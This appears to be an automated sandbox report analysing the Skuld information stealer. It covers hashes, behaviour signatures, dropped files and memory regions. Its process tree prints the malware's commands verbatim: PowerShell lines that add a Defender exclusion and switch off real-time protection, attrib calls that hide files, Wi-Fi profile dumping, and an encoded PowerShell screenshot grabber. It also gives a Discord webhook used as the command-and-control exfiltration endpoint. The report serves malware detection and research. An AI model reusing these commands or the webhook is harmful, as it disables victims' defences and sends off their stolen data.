Analysis

  • max time kernel
    9s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2024 04:16

General

  • Target

    skuld-loader.exe

  • Size

    5.1MB

  • MD5

    004241692178fcd05d3af3634924de1d

  • SHA1

    b95b4ec34b8810edc751cde052c848d77abd8d79

  • SHA256

    97fc89cc80cc312f1d56f93387b03244557a5127e33a02b754af3ff381b723f8

  • SHA512

    cad4a5c6a106bf185df14a434c899958e5c77df182d19d977c8c1ff1fb3f459d9cbeef8f2b8722200a14910e744a6c41c160b224ce92fae0c9261520532f6e1b

  • SSDEEP

    49152:8WH0mLAMdn4S6eo4ZTfSXRRSgcJ1l+Y6Z5EdCtqb8Bb76XMb:Jv7o41AcJ1EE7wBfF

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1307911451826192456/OlBlcktAz-WmiQjz9X7Kjk-297-zipSotjVWMkK52mcmGCBP9eC7G3Fqgu9ZnjAfTnzt

Signatures

  • Skuld family
  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\skuld-loader.exe
    "C:\Users\Admin\AppData\Local\Temp\skuld-loader.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe
      C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4892
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe
        3⤵
        • Views/modifies file attributes
        PID:2764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4312
      • C:\Windows\System32\Wbem\wmic.exe
        wmic os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3380
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        3⤵
        • Views/modifies file attributes
        PID:5008
      • C:\Windows\System32\Wbem\wmic.exe
        wmic cpu get Name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4456
      • C:\Windows\System32\Wbem\wmic.exe
        wmic path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:4008
      • C:\Windows\System32\Wbem\wmic.exe
        wmic csproduct get UUID
        3⤵
          PID:2464
        • C:\Windows\system32\attrib.exe
          attrib -r C:\Windows\System32\drivers\etc\hosts
          3⤵
          • Drops file in Drivers directory
          • Views/modifies file attributes
          PID:4440
        • C:\Windows\system32\attrib.exe
          attrib +r C:\Windows\System32\drivers\etc\hosts
          3⤵
          • Drops file in Drivers directory
          • Views/modifies file attributes
          PID:872
        • C:\Windows\system32\netsh.exe
          netsh wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:2432
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3140
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fex1kxmo\fex1kxmo.cmdline"
            4⤵
              PID:2764
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF6A.tmp" "c:\Users\Admin\AppData\Local\Temp\fex1kxmo\CSC3827F37674DF407A9CE5B6ED6FD0E878.TMP"
                5⤵
                  PID:4944

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          2e907f77659a6601fcc408274894da2e

          SHA1

          9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

          SHA256

          385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

          SHA512

          34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          f41f42c322498af0591f396c59dd4304

          SHA1

          e1e5aa68d73d48bc5e743a34f6c0fa8960ff7514

          SHA256

          d8bd9a4a363ff2ac2dc887759ec6ba4215a4ce0925a8fb9c531573458ee4a31c

          SHA512

          2328a1b402b4fb0de9c451fb630eab58549129d3bcfb70b9834cfbd16065ebaadec006b309ea17ac182d34c53e01705cbc9e0196eb0cbd62600c866e79a1844f

        • C:\Users\Admin\AppData\Local\Temp\Poe08rFSTO\Display (1).png

          Filesize

          195KB

          MD5

          f7ee692f2ada47d0fef4cf2e8c3c7af3

          SHA1

          b8ac4079aa4d14f0f0d43af335ee2bd741f45f0c

          SHA256

          7136eab2b19ef3f8fe0107dffac657597ed8ad27ae615b455ecd62143e81d4d9

          SHA512

          1552faac6653cfacd14e0a40a6d50a9e6c0ee78c51bdfa8a0c2d385b193b9ea37681b275e47e0c48b9944e2b0bfbfb1c216072f905abf5178cfa7aeb00c0efa3

        • C:\Users\Admin\AppData\Local\Temp\RESAF6A.tmp

          Filesize

          1KB

          MD5

          e93525197175014d85876407f6ab33d0

          SHA1

          36298955dc4acfe3dcec3eb19c3bedd943bf8e14

          SHA256

          dc644cb1dd40d8aa16dbdab4521667d26a740413ae9b6d479d44c990bf0952e7

          SHA512

          bf0a2d3c2e7c92c26e499119f8680b9f5db61e092756fae9be4bed65c35d2a33a198fde3ae152f56e48c09c947d1ad8260dab3254c92e686eb8e216c51b9080c

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qt3krhb.kd4.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe

          Filesize

          9.8MB

          MD5

          e6b95c24bdd2f9479be142271dc5e9fe

          SHA1

          9217d024b80cb8470dd6eefd13b640bc22fa8013

          SHA256

          a8cf2a09f633df7b6aebde84a2547d9cadc025a03ba24d89454355de2e3e5395

          SHA512

          946f83501d4f46c77cef082c7c2afffe18dfa092a345152194ad4162a190337adaf8326566ccb9ff6fbe4ec36759ea8d5449674abccddafee4dcdc9f34740c90

        • C:\Users\Admin\AppData\Local\Temp\fex1kxmo\fex1kxmo.dll

          Filesize

          4KB

          MD5

          2adf78e0c0ae657f7060f7cd082e0154

          SHA1

          d66fb10e1f22b835f642eb5effc5b24b2b9345b3

          SHA256

          11cca43a5895d2934a43baa110323ec4f717a301943d8ed56e1c1c53a981576b

          SHA512

          9cedd06c9d09d19a922423aa7f48c3638df8be5744967aeee44809db4fd415e358017b91e7e3bfb9e966e360da2e06a73fc941c72887b37c53c88857e22f92bf

        • C:\Windows\System32\drivers\etc\hosts

          Filesize

          2KB

          MD5

          6e2386469072b80f18d5722d07afdc0b

          SHA1

          032d13e364833d7276fcab8a5b2759e79182880f

          SHA256

          ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

          SHA512

          e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

        • \??\c:\Users\Admin\AppData\Local\Temp\fex1kxmo\CSC3827F37674DF407A9CE5B6ED6FD0E878.TMP

          Filesize

          652B

          MD5

          0bc11a4dcccba302f3659e864856429c

          SHA1

          6e32c53ae4b350e3e0f6244aeb546683b3099333

          SHA256

          f901adf1f7e1736be069ea0f87f75e0b118bb2c3021d68df86210fc0c08c613c

          SHA512

          c695e312fa2730ba25c45116168fb26c570637197dda76975fd11f49fade245701949554db562881b23d63d2540908beff120a280b5fd38dc8ee7a441109e21c

        • \??\c:\Users\Admin\AppData\Local\Temp\fex1kxmo\fex1kxmo.0.cs

          Filesize

          1004B

          MD5

          c76055a0388b713a1eabe16130684dc3

          SHA1

          ee11e84cf41d8a43340f7102e17660072906c402

          SHA256

          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

          SHA512

          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

        • \??\c:\Users\Admin\AppData\Local\Temp\fex1kxmo\fex1kxmo.cmdline

          Filesize

          607B

          MD5

          b57f9f1726eeca3e811d3ed109cf9c25

          SHA1

          7492dcabf6cf1eba6f4fde054839478e085e4d87

          SHA256

          3c73f5906212fdb9f058abee7a1f69ec6eccbd646209d59f96c81b45e87c3498

          SHA512

          cb1193ca847573b2ad8a4af1a0ab627e2abb517b4f09518ddbe011bc7a57a72d222b9777d45884fd2cc54216d99afe63a716d4406054cc39ae7463aaa59f6f68

        • memory/3140-67-0x0000025ED19B0000-0x0000025ED19B8000-memory.dmp

          Filesize

          32KB

        • memory/4312-30-0x00007FFEADFA0000-0x00007FFEAEA61000-memory.dmp

          Filesize

          10.8MB

        • memory/4312-23-0x0000026634A80000-0x0000026634AA2000-memory.dmp

          Filesize

          136KB

        • memory/4312-15-0x00007FFEADFA0000-0x00007FFEAEA61000-memory.dmp

          Filesize

          10.8MB

        • memory/4312-8-0x00007FFEADFA0000-0x00007FFEAEA61000-memory.dmp

          Filesize

          10.8MB

        • memory/4312-7-0x00007FFEADFA3000-0x00007FFEADFA5000-memory.dmp

          Filesize

          8KB